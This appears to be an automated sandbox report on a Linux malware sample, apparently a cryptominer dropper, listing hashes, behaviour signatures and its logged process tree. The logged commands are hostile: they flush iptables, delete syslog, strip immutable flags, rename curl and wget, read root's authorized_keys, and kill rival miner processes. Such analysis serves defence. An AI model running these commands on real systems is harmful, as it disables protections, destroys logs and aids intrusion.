Analysis
-
max time kernel
150s -
platform
debian-9_mips -
resource
debian9-mipsbe-20240611-en -
resource tags
-
submitted
10-08-2024 05:05
General
-
Target
84e5ee91b2eecfb946ff935cd8ff5e80_JaffaCakes118
-
Size
35KB
-
MD5
84e5ee91b2eecfb946ff935cd8ff5e80
-
SHA1
f7cb4120aacc2fc85e7eb655cc2d8fc4d40e59e6
-
SHA256
1b0be209ed0d4918c70b84427667f164f40d90efc2998553cd08f2219d2e6f04
-
SHA512
8b918c0e9c8c42018df31da1eef062215ef6ff4f12046e5ca987aa1e0df7a8a85bad8e5db8cfef4b6fdbfab7be470e250e4bc5845e77b9f0422b6aef966f9485
-
SSDEEP
384:zQQwQHDf6lpTWg3vM4Qdre21jT58vKpG2Y0orcfKLUv0KZnNEVdUeUoJpJydIDbv:TFNB48Fkc2zq0xvcGGIr9L8eT
Score
7/10
Malware Config
Signatures
-
Flushes firewall rules 1 IoCs
Flushes/ disables firewall rules inside the Linux kernel.
-
Attempts to change immutable files 64 IoCs
Modifies inode attributes on the filesystem to allow changing of immutable files.
-
Enumerates running processes
Discovers information about currently running processes on the system
-
Reads CPU attributes 1 TTPs 64 IoCs
-
Reads runtime system information 64 IoCs
Reads data from /proc virtual filesystem.
-
Writes file to tmp directory 1 IoCs
Malware often drops required files in the /tmp directory.
Processes
-
/tmp/84e5ee91b2eecfb946ff935cd8ff5e80_JaffaCakes118/tmp/84e5ee91b2eecfb946ff935cd8ff5e80_JaffaCakes1181⤵
- Writes file to tmp directory
-
/bin/syncsync2⤵
-
/bin/catcat /var/spool/cron/2⤵
-
/bin/catcat /root/.ssh/authorized_keys2⤵
-
/bin/mvmv /usr/bin/curl /usr/bin/url2⤵
-
/bin/mvmv /usr/bin/url /usr/bin/cd12⤵
-
/bin/mvmv /usr/bin/wget /usr/bin/get2⤵
-
/bin/mvmv /usr/bin/get /usr/bin/wd12⤵
-
/bin/rmrm -rf /var/log/syslog2⤵
-
/usr/bin/chattrchattr -iua /tmp/2⤵
- Attempts to change immutable files
-
/usr/bin/chattrchattr -iua /var/tmp/2⤵
-
/sbin/iptablesiptables -F2⤵
- Flushes firewall rules
-
/usr/sbin/userdeluserdel akay2⤵
-
/usr/sbin/userdeluserdel vfinder2⤵
-
/bin/rmrm -rf "/tmp/addres*"2⤵
-
/bin/rmrm -rf "/tmp/walle*"2⤵
-
/bin/rmrm -rf /tmp/keys2⤵
-
/bin/rmrm -f /tmp/.null2⤵
-
/sbin/sysctlsysctl -w "vm.nr_hugepages=128"2⤵
-
/bin/grepgrep 185.71.65.2382⤵
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/usr/bin/awkawk "{print \$7}"2⤵
-
/usr/bin/awkawk "{print \$7}"2⤵
-
/bin/grepgrep 140.82.52.872⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
/usr/bin/awkawk "{print \$7}"2⤵
-
/bin/grepgrep :4432⤵
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
/bin/grepgrep -v -2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/usr/bin/awkawk "{print \$7}"2⤵
-
/bin/grepgrep :232⤵
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
/bin/grepgrep -v -2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/usr/bin/awkawk "{print \$7}"2⤵
-
/bin/grepgrep :4432⤵
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
/bin/grepgrep -v -2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
/usr/bin/awkawk "{print \$7}"2⤵
-
/bin/grepgrep :1432⤵
-
/bin/grepgrep -v -2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
/usr/bin/awkawk "{print \$7}"2⤵
-
/bin/grepgrep :22222⤵
-
/bin/grepgrep -v -2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/usr/bin/awkawk "{print \$7}"2⤵
-
/bin/grepgrep :33332⤵
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
/bin/grepgrep -v -2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/bin/grepgrep :33892⤵
-
/bin/grepgrep -v -2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
/usr/bin/awkawk "{print \$7}"2⤵
-
/usr/bin/awkawk "{print \$7}"2⤵
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/bin/grepgrep -v -2⤵
-
/bin/grepgrep :55552⤵
-
/usr/bin/awkawk "{print \$7}"2⤵
-
/bin/grepgrep :66662⤵
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
/bin/grepgrep -v -2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
/usr/bin/awkawk "{print \$7}"2⤵
-
/bin/grepgrep :66652⤵
-
/bin/grepgrep -v -2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/usr/bin/awkawk "{print \$7}"2⤵
-
/bin/grepgrep :66672⤵
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
/bin/grepgrep -v -2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/usr/bin/awkawk "{print \$7}"2⤵
-
/bin/grepgrep :77772⤵
-
/bin/grepgrep -v -2⤵
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
/usr/bin/awkawk "{print \$7}"2⤵
-
/bin/grepgrep :84442⤵
-
/bin/grepgrep -v -2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/usr/bin/awkawk "-F[/]" "{print \$1}"2⤵
-
/usr/bin/awkawk "{print \$7}"2⤵
-
/bin/grepgrep :33472⤵
-
/bin/grepgrep -v -2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/bin/grepgrep :33332⤵
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
- Reads runtime system information
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
-
/bin/grepgrep :55552⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/grepgrep "kworker -c\\"2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/bin/grepgrep log_2⤵
-
/bin/grepgrep -v grep2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep systemten2⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
- Reads runtime system information
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/bin/grepgrep netns2⤵
-
/bin/psps aux2⤵
- Reads runtime system information
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep -v grep2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/usr/local/sbin/killkill -9 103⤵
-
/usr/local/bin/killkill -9 103⤵
-
/usr/sbin/killkill -9 103⤵
-
/usr/bin/killkill -9 103⤵
-
/sbin/killkill -9 103⤵
-
/bin/killkill -9 103⤵
- Reads CPU attributes
-
/bin/grepgrep voltuned2⤵
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep -v grep2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep darwin2⤵
-
/bin/grepgrep -v grep2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep /tmp/dl2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep /tmp/ddg2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/grepgrep -v grep2⤵
-
/bin/grepgrep /tmp/pprt2⤵
-
/bin/psps aux2⤵
- Reads runtime system information
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep /tmp/ppol2⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep -v grep2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/bin/psps aux2⤵
- Reads CPU attributes
-
/bin/grepgrep "/tmp/65ccE*"2⤵
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep "/tmp/jmx*"2⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/bin/grepgrep "/tmp/2Ne80*"2⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
- Reads runtime system information
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep IOFoqIgyC0zmf2UR2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep 45.76.122.922⤵
-
/bin/grepgrep -v grep2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/bin/psps aux2⤵
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep 51.38.191.1782⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/bin/grepgrep 51.15.56.1612⤵
-
/bin/grepgrep -v grep2⤵
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/psps aux2⤵
- Reads runtime system information
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep 86s.jpg2⤵
-
/bin/grepgrep -v grep2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep aGTSGJJp2⤵
-
/bin/grepgrep -v grep2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/bin/psps aux2⤵
- Reads runtime system information
-
/bin/grepgrep nMrfmnRa2⤵
-
/bin/grepgrep -v grep2⤵
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/bin/psps aux2⤵
- Reads CPU attributes
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep PuNY5tm22⤵
-
/bin/grepgrep -v grep2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep I0r8Jyyt2⤵
-
/bin/grepgrep -v grep2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/bin/psps aux2⤵
- Reads runtime system information
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep AgdgACUD2⤵
-
/bin/grepgrep -v grep2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/bin/psps aux2⤵
- Reads CPU attributes
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep uiZvwxG82⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep hahwNEdB2⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep BtwXn5qH2⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep 3XEzey2T2⤵
-
/bin/grepgrep -v grep2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/bin/psps aux2⤵
- Reads runtime system information
-
/bin/grepgrep t2tKrCSZ2⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/bin/grepgrep svc2⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep HD7fcBgg2⤵
-
/bin/grepgrep -v grep2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/bin/psps aux2⤵
- Reads runtime system information
-
/bin/grepgrep -v grep2⤵
-
/bin/grepgrep zXcDajSs2⤵
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/bin/psps aux2⤵
- Reads runtime system information
-
/bin/grepgrep 3lmigMo2⤵
-
/bin/grepgrep -v grep2⤵
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep AkMK4A22⤵
-
/bin/grepgrep -v grep2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/bin/psps aux2⤵
- Reads CPU attributes
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep AJ2AkKe2⤵
-
/bin/grepgrep -v grep2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep HiPxCJRS2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep http_0xCC0302⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/psps aux2⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/grepgrep http_0xCC0312⤵
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep http_0xCC0322⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep http_0xCC0332⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep C4iLM4L2⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep aziplcr72qjhzvin2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/usr/bin/awkawk "{ if(substr(\$11,1,2)==\"./\" && substr(\$12,1,2)==\"./\") print \$2 }"2⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
- Reads runtime system information
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep /boot/vmlinuz2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep i4b503a52cc52⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep dgqtrcst23rtdi3ldqk322j22⤵
-
/bin/grepgrep -v grep2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/bin/psps aux2⤵
- Reads runtime system information
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep 2g0uv7npuhrlatd2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/bin/grepgrep nqscheduler2⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep rkebbwgqpl4npmm2⤵
-
/bin/grepgrep -v grep2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/bin/psps aux2⤵
-
/bin/grepgrep -v aux2⤵
-
/bin/grepgrep "]"2⤵
-
/bin/grepgrep -v grep2⤵
-
/usr/bin/awkawk "\$3>10.0{print \$2}"2⤵
-
/bin/psps aux2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep 2fhtu70teuhtoh78jc5s2⤵
-
/bin/grepgrep -v grep2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/bin/psps aux2⤵
- Reads runtime system information
-
/bin/grepgrep 0kwti6ut420t2⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep 44ct7udt0patws3agkdfqnjm2⤵
-
/bin/grepgrep -v grep2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/bin/psps aux2⤵
-
/bin/grepgrep -v /2⤵
-
/bin/grepgrep -v -2⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/grepgrep -v _2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/usr/bin/awkawk "length(\$11)>19{print \$2}"2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/bin/grepgrep -v grep2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/bin/grepgrep "\\[^"2⤵
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep rsync2⤵
-
/bin/grepgrep -v grep2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/bin/psps aux2⤵
-
/bin/grepgrep watchd0g2⤵
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep -v grep2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/bin/psps aux2⤵
- Reads runtime system information
-
/bin/psps aux2⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/egrepegrep "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/usr/local/sbin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵
-
/usr/local/bin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵
-
/usr/sbin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵
-
/usr/bin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵
-
/sbin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵
-
/bin/grepgrep -E "wnTKYg|2t3ik|qW3xT.2|ddg"2⤵
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep 158.69.133.18:82202⤵
-
/bin/grepgrep -v grep2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/bin/psps aux2⤵
- Reads CPU attributes
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep /tmp/java2⤵
-
/bin/grepgrep -v grep2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/bin/psps aux2⤵
- Reads runtime system information
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep gitee.com2⤵
-
/bin/grepgrep -v grep2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep /tmp/java2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep 104.248.4.1622⤵
-
/bin/grepgrep -v grep2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep 89.35.39.782⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
- Reads runtime system information
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep /dev/shm/z3.sh2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
- Reads runtime system information
-
/bin/grepgrep kthrotlds2⤵
-
/bin/grepgrep -v grep2⤵
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/bin/psps aux2⤵
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep ksoftirqds2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
-
/bin/grepgrep netdns2⤵
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep -v grep2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep watchdogs2⤵
-
/bin/grepgrep -v grep2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
-
/bin/grepgrep kdevtmpfsi2⤵
-
/bin/grepgrep -v grep2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep kinsing2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
-
/bin/psps aux2⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/grepgrep redis22⤵
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/bin/grepgrep " ps"2⤵
-
/bin/grepgrep -v aux2⤵
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep -v grep2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/bin/psps aux2⤵
-
/bin/grepgrep sync_supers2⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
- Reads runtime system information
-
/usr/bin/cutcut -c 9-152⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/usr/bin/cutcut -c 9-152⤵
-
/bin/grepgrep cpuset2⤵
-
/bin/grepgrep -v grep2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/bin/psps aux2⤵
-
/bin/grepgrep "x]"2⤵
-
/bin/grepgrep -v aux2⤵
-
/bin/grepgrep -v grep2⤵
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/bin/grepgrep "sh] <"2⤵
-
/bin/grepgrep -v aux2⤵
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep -v grep2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/bin/psps aux2⤵
- Reads runtime system information
-
/bin/grepgrep " \\[]"2⤵
-
/bin/grepgrep -v aux2⤵
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep -v grep2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/bin/psps aux2⤵
- Reads CPU attributes
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep /tmp/l.sh2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
- Reads runtime system information
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
- Reads CPU attributes
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
-
/bin/grepgrep /tmp/zmcat2⤵
-
/usr/bin/awkawk "{print \$2}"2⤵
-
/bin/grepgrep hahwNEdB2⤵
-
/usr/bin/xargsxargs -I "%" kill -9 "%"2⤵
- Attempts to change immutable files
-
/bin/grepgrep -v grep2⤵
-
/bin/psps aux2⤵
-
/usr/bin/awkawk "{print \$2}"2⤵
